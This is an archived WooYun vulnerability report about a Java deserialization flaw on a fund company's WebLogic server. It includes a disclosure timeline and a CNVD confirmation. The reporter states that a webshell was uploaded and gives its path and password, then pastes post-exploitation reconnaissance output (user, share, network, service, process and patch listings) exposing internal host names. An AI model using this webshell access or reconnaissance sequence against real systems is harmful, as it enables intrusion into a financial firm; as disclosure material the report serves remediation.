乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-17: 细节已通知厂商并且等待厂商处理中 2016-01-20: 厂商已经确认,细节仅向厂商公开 2016-01-30: 细节向核心白帽子及相关领域专家公开 2016-02-09: 细节向普通白帽子公开 2016-02-19: 细节向实习白帽子公开 2016-03-05: 细节向公众公开
简介地址:http://finance.sina.com.cn/fund/company/80000240.shtmlhttp://jingzhi.funds.hexun.com/wanjia.shtml一个有钱有权的主!
万家共赢专户帐户查询系统打开官网http://**.**.**.**/点击标识1链接后,再点击标识链接2,即可进入系统登录界面。
地址**.**.**.**:7001/存在“Java 反序列化”漏洞
直接上传木马到服务器中**.**.**.**:7001/jmxroot/jmxroot.jsp密码kakaxi
whoamiwjgy-wsxtapp\wjgyadminnet user\\WJGY-WSXTAPP 的用户帐户-------------------------------------------------------------------------------Guest wjgyadmin 命令成功完成。net share共享名 资源 注解-------------------------------------------------------------------------------C$ C:\ 默认共享 D$ D:\ 默认共享 IPC$ 远程 IPC ADMIN$ C:\Windows 远程管理 命令成功完成。net view服务器名称 注解-------------------------------------------------------------------------------\\DIWUDAI-JIAOY wjasset-dwdjy \\FM-BACK \\FM-BACKCOLD \\GDSYDATASERVER \\GSZQ-APP01 \\KM-COLD \\KM-COLD01 \\MICROPT \\O32TESTAPP \\S17 \\TATEST1 \\TRADEMANAGER \\WANJIA-HPDL388G \\WANJIA2015 \\WIN-6982B2TT887 \\WIN-EOMB8NJIA38 \\WJ-C259B8F6C092 \\WJASSET-JYT03 \\WJGY-FILESERVER \\WJGY-HP6300 \\WJGY-MTCMP-2 MTCMP \\WJGY-TAAPP \\WJGY-TCMPAPP \\WJGY-WATCHDOG \\WJGY-WEB1 \\WJGY-WEB3 \\WJGY-WEB4 \\WJGY-WEB5 \\WJGY-WEB6 \\WJGY-WSXTAPP \\WJGY-ZHJAPP \\WJJJ-DWDJY01 \\WJJJ-WEBDEVELOP \\WJKF-DB-COLD \\WWW-B641331BD34 命令成功完成。net start已经启动以下 Windows 服务: Application Experience Background Intelligent Transfer Service Base Filtering Engine Certificate Propagation COM+ Event System COM+ System Application Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Diagnostics Tracking Service Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Group Policy Client IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent KS Remote Monitoring Agent Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Power Print Spooler QQPCMgr RTP Service Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector Remote Procedure Call (RPC) Remote Registry RPC Endpoint Mapper Security Accounts Manager Server Shell Hardware Detection System Event Notification Service Task Scheduler TCP/IP NetBIOS Helper User Profile Service VMTools Windows Event Log Windows Firewall Windows Font Cache Service Windows Management Instrumentation Windows Remote Management (WS-Management) Windows Update Workstation命令成功完成。netstat -ano活动连接 协议 本地地址 外部地址 状态 PID TCP **.**.**.**:135 **.**.**.**:0 LISTENING 900 TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:1055 **.**.**.**:0 LISTENING 1668 TCP **.**.**.**:3389 **.**.**.**:0 LISTENING 1996 TCP **.**.**.**:8453 **.**.**.**:0 LISTENING 4904 TCP **.**.**.**:47001 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:49152 **.**.**.**:0 LISTENING 464 TCP **.**.**.**:49153 **.**.**.**:0 LISTENING 236 TCP **.**.**.**:49154 **.**.**.**:0 LISTENING 408 TCP **.**.**.**:49155 **.**.**.**:0 LISTENING 576 TCP **.**.**.**:49156 **.**.**.**:0 LISTENING 568 TCP **.**.**.**:49157 **.**.**.**:0 LISTENING 2076 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 4904 TCP **.**.**.**:9033 **.**.**.**:0 LISTENING 4904 TCP **.**.**.**:139 **.**.**.**:0 LISTENING 4 TCP **.**.**.**:7001 **.**.**.**:0 LISTENING 4904 TCP **.**.**.**:7001 **.**.**.**:22805 ESTABLISHED 4904 TCP **.**.**.**:7001 **.**.**.**:22816 ESTABLISHED 4904 TCP **.**.**.**:7001 **.**.**.**:24182 TIME_WAIT 0 TCP **.**.**.**:7001 **.**.**.**:24183 ESTABLISHED 4904 TCP **.**.**.**:7001 **.**.**.**:24198 ESTABLISHED 4904 TCP **.**.**.**:9033 **.**.**.**:0 LISTENING 4904 TCP **.**.**.**:53275 **.**.**.**:1521 ESTABLISHED 4904 TCP **.**.**.**:53276 **.**.**.**:1521 ESTABLISHED 4904 TCP **.**.**.**:53298 **.**.**.**:445 ESTABLISHED 4 TCP **.**.**.**:53316 **.**.**.**:139 TIME_WAIT 0 TCP [::]:135 [::]:0 LISTENING 900 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:3389 [::]:0 LISTENING 1996 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 464 TCP [::]:49153 [::]:0 LISTENING 236 TCP [::]:49154 [::]:0 LISTENING 408 TCP [::]:49155 [::]:0 LISTENING 576 TCP [::]:49156 [::]:0 LISTENING 568 TCP [::]:49157 [::]:0 LISTENING 2076 UDP **.**.**.**:500 *:* 408 UDP **.**.**.**:4500 *:* 408 UDP **.**.**.**:5355 *:* 1196 UDP **.**.**.**:50318 *:* 824 UDP **.**.**.**:58862 *:* 4904 UDP **.**.**.**:61677 *:* 2992 UDP **.**.**.**:65416 *:* 2424 UDP **.**.**.**:137 *:* 4 UDP **.**.**.**:138 *:* 4 UDP [::]:500 *:* 408 UDP [::]:4500 *:* 408 UDP [::]:5355 *:* 1196 UDP [::]:58862 *:* 4904tasklist /svc映像名称 PID 服务 ========================= ======== ============================================System Idle Process 0 暂缺 System 4 暂缺 smss.exe 320 暂缺 csrss.exe 424 暂缺 wininit.exe 464 暂缺 csrss.exe 472 暂缺 winlogon.exe 508 暂缺 services.exe 568 暂缺 lsass.exe 576 SamSs lsm.exe 588 暂缺 svchost.exe 680 DcomLaunch, PlugPlay, Power QQPCRTP.exe 824 QQPCRTP svchost.exe 900 RpcEptMapper, RpcSs svchost.exe 236 Dhcp, eventlog, lmhosts svchost.exe 408 AeLookupSvc, BITS, CertPropSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, SessionEnv, ShellHWDetection, Winmgmt, wuauserv svchost.exe 916 EventSystem, FontCache, netprofm, nsi svchost.exe 1112 Netman, TrkWks, UmRdpService, UxSms svchost.exe 1196 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM svchost.exe 1408 BFE, DPS, MpsSvc spoolsv.exe 1544 Spooler svchost.exe 1592 DiagTrack svchost.exe 1632 RemoteRegistry rma.exe 1668 RMAService vmtoolsd.exe 1948 VMTools svchost.exe 1996 TermService svchost.exe 2076 PolicyAgent dllhost.exe 2340 COMSysApp msdtc.exe 2524 MSDTC taskhost.exe 3008 暂缺 dwm.exe 1268 暂缺 explorer.exe 2424 暂缺 vmtoolsd.exe 3000 暂缺 QQPCTray.exe 2992 暂缺 wuauclt.exe 4624 暂缺 cmd.exe 1044 暂缺 conhost.exe 3836 暂缺 java.exe 4904 暂缺 findstr.exe 5112 暂缺 conhost.exe 4008 暂缺 tasklist.exe 4592 暂缺 conhost.exe 4076 暂缺 WmiPrvSE.exe 4564 暂缺 ipconfig /allWindows IP 配置 主机名 . . . . . . . . . . . . . : wjgy-wsxtapp 主 DNS 后缀 . . . . . . . . . . . : 节点类型 . . . . . . . . . . . . : 混合 IP 路由已启用 . . . . . . . . . . : 否 WINS 代理已启用 . . . . . . . . . : 否以太网适配器 本地连接: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection 物理地址. . . . . . . . . . . . . : 00-50-56-90-00-2C DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 本地链接 IPv6 地址. . . . . . . . : fe80::d1e2:27c2:726a:a1a6%11(首选) IPv4 地址 . . . . . . . . . . . . : **.**.**.**(首选) 子网掩码 . . . . . . . . . . . . : **.**.**.** 默认网关. . . . . . . . . . . . . : **.**.**.** DHCPv6 IAID . . . . . . . . . . . : 234901590 DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-1A-66-EF-A9-00-50-56-90-00-2C DNS 服务器 . . . . . . . . . . . : **.**.**.** **.**.**.** TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{CA0CEFF3-860A-4ECF-8394-69B4A5F6FC11}: 媒体状态 . . . . . . . . . . . . : 媒体已断开 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是隧道适配器 本地连接* 2: 连接特定的 DNS 后缀 . . . . . . . : 描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface 物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0 DHCP 已启用 . . . . . . . . . . . : 否 自动配置已启用. . . . . . . . . . : 是 IPv6 地址 . . . . . . . . . . . . : 2001:0:b4a8:29af:24eb:eaf:53ef:f5c2(首选) 本地链接 IPv6 地址. . . . . . . . : fe80::24eb:eaf:53ef:f5c2%12(首选) 默认网关. . . . . . . . . . . . . : :: TCPIP 上的 NetBIOS . . . . . . . : 已禁用systeminfo主机名: WJGY-WSXTAPPOS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: wjasset注册的组织: wjasset产品 ID: 55041-178-8169594-84304初始安装日期: 2014/1/14, 21:13:00系统启动时间: 2016/1/2, 12:29:26系统制造商: VMware, Inc.系统型号: VMware Virtual Platform系统类型: x64-based PC处理器: 安装了 2 个处理器。 [01]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2094 Mhz [02]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2094 MhzBIOS 版本: Phoenix Technologies LTD 6.00, 2012/6/22Windows 目录: C:\Windows系统目录: C:\Windows\system32启动设备: \Device\HarddiskVolume1系统区域设置: zh-cn;中文(中国)输入法区域设置: zh-cn;中文(中国)时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐物理内存总量: 8,191 MB可用的物理内存: 6,703 MB虚拟内存: 最大值: 16,381 MB虚拟内存: 可用: 14,161 MB虚拟内存: 使用中: 2,220 MB页面文件位置: C:\pagefile.sys域: WORKGROUP登录服务器: \\WJGY-WSXTAPP修补程序: 安装了 245 个修补程序。 [01]: KB981391 [02]: KB981392 [03]: KB977236 [04]: KB981111 [05]: KB977238 [06]: KB2849697 [07]: KB2849696 [08]: KB2841134 [09]: KB2841134 [10]: KB977239 [11]: KB2670838 [12]: KB2830477 [13]: KB2592687 [14]: KB981390 [15]: KB2386667 [16]: KB2425227 [17]: KB2506014 [18]: KB2506212 [19]: KB2506928 [20]: KB2509553 [21]: KB2511455 [22]: KB2515325 [23]: KB2533552 [24]: KB2536275 [25]: KB2536276 [26]: KB2541014 [27]: KB2544893 [28]: KB2545698 [29]: KB2547666 [30]: KB2552343 [31]: KB2560656 [32]: KB2563227 [33]: KB2564958 [34]: KB2570947 [35]: KB2574819 [36]: KB2584146 [37]: KB2585542 [38]: KB2603229 [39]: KB2604115 [40]: KB2607047 [41]: KB2608658 [42]: KB2620704 [43]: KB2621440 [44]: KB2631813 [45]: KB2636573 [46]: KB2639308 [47]: KB2640148 [48]: KB2643719 [49]: KB2647753 [50]: KB2653956 [51]: KB2654428 [52]: KB2655992 [53]: KB2656356 [54]: KB2660075 [55]: KB2667402 [56]: KB2676562 [57]: KB2685811 [58]: KB2685813 [59]: KB2685939 [60]: KB2690533 [61]: KB2691442 [62]: KB2698365 [63]: KB2699779 [64]: KB2705219 [65]: KB2706045 [66]: KB2709630 [67]: KB2712808 [68]: KB2718704 [69]: KB2719857 [70]: KB2726535 [71]: KB2729094 [72]: KB2729452 [73]: KB2732059 [74]: KB2742599 [75]: KB2743555 [76]: KB2750841 [77]: KB2757638 [78]: KB2758857 [79]: KB2761217 [80]: KB2763523 [81]: KB2765809 [82]: KB2770660 [83]: KB2785220 [84]: KB2786081 [85]: KB2786400 [86]: KB2789645 [87]: KB2791765 [88]: KB2798162 [89]: KB2800095 [90]: KB2807986 [91]: KB2808679 [92]: KB2813347 [93]: KB2813430 [94]: KB2820331 [95]: KB2833946 [96]: KB2834140 [97]: KB2834886 [98]: KB2836943 [99]: KB2839894 [100]: KB2840149 [101]: KB2843630 [102]: KB2844286 [103]: KB2847311 [104]: KB2849470 [105]: KB2852386 [106]: KB2853952 [107]: KB2855844 [108]: KB2857650 [109]: KB2861855 [110]: KB2862152 [111]: KB2862330 [112]: KB2862335 [113]: KB2862966 [114]: KB2862973 [115]: KB2863240 [116]: KB2864058 [117]: KB2864202 [118]: KB2868038 [119]: KB2868116 [120]: KB2868623 [121]: KB2868626 [122]: KB2868725 [123]: KB2871997 [124]: KB2872339 [125]: KB2875783 [126]: KB2876284 [127]: KB2876331 [128]: KB2882822 [129]: KB2884256 [130]: KB2887069 [131]: KB2888049 [132]: KB2891804 [133]: KB2892074 [134]: KB2893294 [135]: KB2893519 [136]: KB2893984 [137]: KB2894844 [138]: KB2898785 [139]: KB2900986 [140]: KB2904266 [141]: KB2908783 [142]: KB2911501 [143]: KB2912390 [144]: KB2923545 [145]: KB2928562 [146]: KB2929733 [147]: KB2931356 [148]: KB2937610 [149]: KB2957189 [150]: KB2966583 [151]: KB2968294 [152]: KB2970228 [153]: KB2972100 [154]: KB2972211 [155]: KB2973201 [156]: KB2973351 [157]: KB2976897 [158]: KB2977292 [159]: KB2977728 [160]: KB2978120 [161]: KB2984972 [162]: KB2985461 [163]: KB2991963 [164]: KB2992611 [165]: KB2993651 [166]: KB2999226 [167]: KB3003743 [168]: KB3004361 [169]: KB3004375 [170]: KB3005607 [171]: KB3006137 [172]: KB3006226 [173]: KB3006625 [174]: KB3010788 [175]: KB3011780 [176]: KB3014029 [177]: KB3018238 [178]: KB3019978 [179]: KB3020338 [180]: KB3020369 [181]: KB3020370 [182]: KB3020388 [183]: KB3021674 [184]: KB3022777 [185]: KB3023215 [186]: KB3030377 [187]: KB3031432 [188]: KB3032655 [189]: KB3033889 [190]: KB3033929 [191]: KB3035126 [192]: KB3035132 [193]: KB3037574 [194]: KB3040272 [195]: KB3042058 [196]: KB3042553 [197]: KB3045685 [198]: KB3046017 [199]: KB3046269 [200]: KB3054205 [201]: KB3054476 [202]: KB3055642 [203]: KB3059317 [204]: KB3060716 [205]: KB3061518 [206]: KB3068457 [207]: KB3068708 [208]: KB3069392 [209]: KB3071756 [210]: KB3072595 [211]: KB3072630 [212]: KB3072633 [213]: KB3074543 [214]: KB3075220 [215]: KB3075226 [216]: KB3075249 [217]: KB3076895 [218]: KB3078601 [219]: KB3078667 [220]: KB3080079 [221]: KB3080149 [222]: KB3080446 [223]: KB3081320 [224]: KB3084135 [225]: KB3086255 [226]: KB3087039 [227]: KB3092601 [228]: KB3092627 [229]: KB3097966 [230]: KB3097989 [231]: KB3101246 [232]: KB3101722 [233]: KB3101746 [234]: KB3102429 [235]: KB3104002 [236]: KB3107998 [237]: KB3108371 [238]: KB3108381 [239]: KB3108670 [240]: KB3109094 [241]: KB3109103 [242]: KB3112148 [243]: KB3112343 [244]: KB976902 [245]: KB982018网卡: 安装了 2 个 NIC。 [01]: Intel(R) PRO/1000 MT Network Connection 连接名: 本地连接 启用 DHCP: 否 IP 地址 [01]: **.**.**.** [02]: fe80::d1e2:27c2:726a:a1a6 [02]: Intel(R) PRO/1000 MT Network Connection 连接名: 本地连接 2 状态: 没有硬件
加强安全意识
危害等级:高
漏洞Rank:12
确认时间:2016-01-20 16:09
CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无
